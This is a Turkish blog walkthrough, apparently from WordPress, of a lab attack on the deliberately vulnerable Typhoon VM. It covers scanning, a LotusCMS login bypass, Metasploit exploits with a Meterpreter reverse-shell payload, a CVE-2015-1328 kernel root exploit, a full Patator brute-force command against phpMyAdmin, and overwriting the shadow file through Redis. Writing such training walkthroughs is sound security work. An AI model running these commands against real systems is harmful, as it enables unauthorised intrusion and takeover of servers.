Typhoon Walkthroughs

PrismaCSI ekibine hazırladıkları Typhoon  makinesi için teşekkür ederim 

Makinemizi VM’e kurduktan sonra VM network ayarlarını Birdge‘e getirdik.

Kendi saldırgan makinemizi açtık ve  netdiscover ile ağ taraması yaptık.

netdiscover –r 192.168.1.0/24 

netdiscoverı.PNG

192.168.1.7 IP adresinin Typhoon Vulnerable VM’e ait olduğunu bulduk.

Typhoon’u bulduktan sonra nmap  ile port ve versiyon taraması yaptık.

nmap -sT -sV -O 192.168.1.7

nmapkısa.PNG

Nmap taraması sonucu açık portlar ,servisler  ve versiyonları bulduk.

21.Port FTP

İlk gözümüze çarpan 21. Portta çalışan FTP servisi oldu.

21. Porta özel bir nmap taraması yaptık. 

nmap -A -p 21 192.168.1.7

ftpnmap.PNG

Anonymous olarak bağlantı sağlayabileceğimizi gördük.

ftp 192.168.1.7 21

Bağlantı yaptık

ftp baglantı.PNG

Giriş başarılı oldu.

nothingı.PNG

Görüldüğü gibi içi bomboş. 

80.Port http

 Bilgi toplama amacıyla uniscan ile genel bir tarama yaptık.

uniscan  -u http://192.168.1.104  -qweds

uniscan.PNG

Tarama sonucunda cms ve phpmyadmin dizinlerini ve robots.txt nin altında disallow olarak bırakılan mongoadmin dizinini bulduk.

2.1- /cms Dizini Altındaki Olaylar

192.168.1.7/cms sayfasına gittiğimizde masum bir ana sayfa bizleri bekliyordu.

cmsana.PNG

Lotuscms ile ilgili bir zafiyet var mi diye  searchsploit ile arama yaptık.

txextı.PNG

Arama sonucu bulduğumuz zafiyet sayesinde login paneline bypass yapabileceğimizi düşündük.

192.168.1.7/cms/index.php?system=Admin  sayfasına “User&page=Users&page=edit&active=USERNAME”  eklenerek gönderildi.

192.168.1.7/cms/index.php?system=User&page=Users&page=edit&active=USERNAME

bypasslogin.PNG

İçeriye girdik. Fakat tam erişim sağlanılmadı. Bu sayfanın bize sağladığı yarar  “Fraise 3.0” yazısını göstermesiydi.

Google da arama yaparak Fraise 3.0  ile ilgili bilgi edindik. Araştırmamız sonrası lotus CMS farise 3.0 ‘in exploit’ini bulduk.

Metasploitimizi açtık. “Lotus CMS” exploitini kendi sanal makinemizde de aradık.

LOtuscmssearch.PNG

use exploit/multi/http/lcms_php_exec

diyerek exploitimizi kullanıma hazır hale getirdik. Son rötuşları  yaptık.

Payloadımızı seçtik.

set payload /php/meterpreter/reverse_tcp

ve  run dedik.

run.PNG

Meterpreter’ a düştük. Shellimizi aldık. www-data olduk. 

shellı.PNG

Fakat bununla kalsın istemedik. Bir şekilde root olmamız gerekiyordu.Bu sebeple root olabilmek için araştırmaya başladık.

uname -a

Sürüm özelliklerini öğrendik.

uname.PNG

Ubuntu-3.13 versiyonu ile ilgili zafiyet araştırması yaptık. Ubuntu’nun 3.13 ile 3.19 arasındaki tüm sürümlerinde bulunan CVE-2015-1328 isimli bir zafiyet barındırdığını öğrendik. 

Exploit’i https://www.exploit-db.com/exploits/37292/  sitesinden kendi sanal makinemize indirdik. Daha sonra wget ile kendi makinemizden Typhoon’a çektik.

wget 192.168.1.7/37292.c 

cekişı.PNG

İndirdiğimiz exploit’i çalıştırılabilir hale getirdik.

gcc 3792.c  - o hacivat

hacivat.PNG

Root olabilmek için son aşamaya geçtik. Hacivat dosyasını çalıştırıp exploitimizi devreye soktuk.

root.PNG

ve root olduk.

2.2- /PhpAdmin Dizini Altındaki Olaylar

http://192.168.1.7/phpmyadmin sayfasına baktığımızda karşımıza login sayfası çıktı.

my admin.PNG

Manuel olarak Kullanıcı adı ve parolayı bulmamıza rağmen size göstermek amacıyla brute-force atağı gerçekleştirdik.

Hydra ve Burpsuit ile kaba kuvvet saldırısı yaptık. Fakat başarılı olamadık. Kaba kuvvet saldırısı yapabilmek için araştırmamızı yaptık ve Patator tool’u ile tanıştık.

Başlangıç olarak burp ile araya girip neler olduğunu inceledik.

burpp

Resimde işaretli kısım Patator’un body kısmını oluşturuyor. ignore kısmı ise php myadmin sayfasında yanlış şifre girdiğimizde aldığımız hata kısmı.

patator http_fuzz url=http://192.168.1.5/phpmyadmin/index.php method=POST body='pma_username=FILE0&pma_password=FILE1&server=1&lang=en' 0=/root/Masaüstü/word.txt 1=/root/Masaüstü/word.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server' 

Patator ile  kaba kuvvet saldırısı yaptık.

root_toor.png

Kullanıcı adını root ve şifreyi toor olarak bulduk.

Phpmyadmin paneline bulduğumuz kullanıcı adı ve parola ile giriş yaptık.

giriş.PNG

2.3- /Calendar Dizini Altındaki Olaylar

Calendar dizinine gidildiğinde login sayfasıyla karşılaştık. Login sayfasını geçmek için phpmyadmin sayfasındaki sql database’de bulduğumuz md5 ile şifrelenmiş paroladan yararlandık.

admin.PNG

Calender database’inde bulunan webcal_user altında bulduğumuz md5 ile şifrelenmiş parolayı  kırdık.

decryptı.PNG

admin” isimli kullanıcının parolasının “admin” olduğunu keşfettik.

192.168.1.5/calendar/login.php sayfasında ki login paneline bulduğumuz admin kullanıcı ismi  ve admin parolası ile giriş yaptık.

girişyaptıkı.PNG

Daha sonra Webcalendar versiyonuna baktığımızda 1.2.4 olduğunu gördük.

versionsı.PNG

Webcalender ile ilgili searchsploit ile arama yaptık ve exploitini bulduk.

exploitı.PNG

Metasploit ile kullanıma hazır hale getirdik.

calanexploitı.PNG

Exploitimizi çalıştırdık.

ww-datası.PNG

www-data olduk.

Bu aşamadan sonra tekrardan Local Privilege Escalation yapıp root yetkisine ulaşabiliriz.

3.6379.Port Redis

Redis deyip geçmeyin gün gelir canınızı yakar.

Not:Bu portta ki zafiyeti gerçekleştirmeden önce makinenizi yedeklemenizi öneririz.

İlk olarak kendi sanal makinemizde /var/www/html dosyası altına shadow isimli bir txt dosyası oluşturduk. Daha sonra kendi sanal makinemizde bulunan shadow dosyasını açıp belli bir kısmını kopyaladık ve  /var/www/html altındaki shadow dosyasının içine yapıştırdık.

shadow.PNG

Shadow dosyasına chmod 600 değeri vererek  root yetkisiyle donattık.

Oluşturduğumuz dosyayı, redis portundan yüklemek için  metasploitimizi açtık.

use auxiliary/scanner/redis/file_upload

modülünü kullandık.

exploitı.PNG

Run dedik ve sahte shadow dosyamızı yolladık.

ispatı.PNG

Sahte shadow dosyasını başarıyla gönderdik.

Bir kaç ssh bağlantı denemesi yaptık fakat başarılı olamadık. Bizde direkt Typhoon Vulnerable VM’in login ekranından, shadow dosyası sayesinde atadığımız root parolası ile giriş yaptık.

rootı.PNG

Girişimiz başarıyla gerçekleşti. Birde typhoon içindeki shadow dosyası ne hale gelmiş onu kontrol edelim.

redisshadowı.PNG

Görüldüğü gibi eski shadow dosyası gitmiş, yerine ise bizim attığımız shadow dosyası gelmiş.

 

Reklamlar

Typhoon Walkthroughs” için bir yorum

  1. Cüneyt Çelebi 6 Kasım 2018 — 01:05

    Çok istifade ettik. Paylaşımınız için teşekkür ederiz. Allah razı olsun.

    Beğen

Bir Cevap Yazın

Aşağıya bilgilerinizi girin veya oturum açmak için bir simgeye tıklayın:

WordPress.com Logosu

WordPress.com hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Google+ fotoğrafı

Google+ hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Twitter resmi

Twitter hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Facebook fotoğrafı

Facebook hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Connecting to %s

WordPress.com' da yeni bir web sitesi oluşturun
Başla
%d blogcu bunu beğendi:
search previous next tag category expand menu location phone mail time cart zoom edit close